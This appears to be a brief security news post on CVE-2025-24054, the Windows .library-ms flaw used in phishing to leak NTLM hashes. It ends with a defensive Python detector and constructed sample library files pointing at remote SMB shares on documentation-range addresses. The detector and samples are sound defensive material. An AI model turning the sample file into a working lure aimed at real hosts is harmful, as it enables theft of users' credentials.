Hackers Exploit Windows Flaw: NTLM Hashes at Risk in Sneaky Phishing Attack

Hackers are exploiting a Windows vulnerability to capture NTLM hashes using .library-ms files, targeting government and private entities. Although the flaw has been patched, active exploitation was observed shortly after the patch. The flaw, CVE-2025-24054, needs only minimal user interaction and so poses a significant risk; organizations are urged to apply security updates and disable NTLM where it is not needed.


Hot Take:

Who knew that a seemingly innocuous .library-ms file could pack such a punch? It’s like finding out your cat has been secretly leading a double life as a cybercriminal. If you’ve been using NTLM like it’s 1999, it’s time to let go and embrace Kerberos—because NTLM is basically the MySpace of authentication protocols right now.

Key Points:

  • CVE-2025-24054 is a Windows vulnerability that exposes NTLM hashes using .library-ms files.
  • The flaw was initially not considered actively exploited but is now being used in phishing campaigns.
  • Phishing emails targeting Polish and Romanian entities included malicious .library-ms files.
  • The attacks involve remote SMB servers capturing NTLM hashes for potential privilege escalation.
  • Organizations are advised to update systems and disable NTLM if possible.
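
For defenders screening attachments, the following is an added example (not from the article or any vendor) that flags .library-ms files pointing at a UNC share. It assumes the share location sits in the `<url>` elements of the library XML; the sample documents, addresses and the `unc_hosts` name are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# \\host\share ; group 1 is the host. Single-backslash local paths do not match.
UNC = re.compile(r'\\\\([A-Za-z0-9._-]+)\\[^\s<>"]+')

def unc_hosts(data: bytes, allowed=frozenset()) -> list[str]:
    """Return hosts of UNC locations in a .library-ms document, minus allowed ones."""
    try:
        root = ET.fromstring(data)
        # Namespace-agnostic: collect the text of every <url> element.
        texts = [el.text or "" for el in root.iter()
                 if el.tag.rsplit("}", 1)[-1].lower() == "url"]
    except ET.ParseError:
        # A broken file is still suspicious, so scan its raw text instead.
        texts = [data.decode("utf-8", errors="replace")]
    hosts = []
    for text in texts:
        for match in UNC.finditer(text):
            host = match.group(1).lower()
            if host not in allowed and host not in hosts:
                hosts.append(host)
    return hosts

# Constructed samples; addresses come from documentation ranges.
SAMPLE_REMOTE = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>\\192.0.2.10\shared</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

SAMPLE_LOCAL = rb"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>"""

SAMPLE_BROKEN = rb"<libraryDescription><url>\\198.51.100.7\docs</url>"

if __name__ == "__main__":
    for name, doc in [("remote", SAMPLE_REMOTE), ("local", SAMPLE_LOCAL),
                      ("broken", SAMPLE_BROKEN)]:
        print(name, unc_hosts(doc))
```

Pass known internal file servers in `allowed` so that only unexpected hosts are reported.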

The Nimble Nerd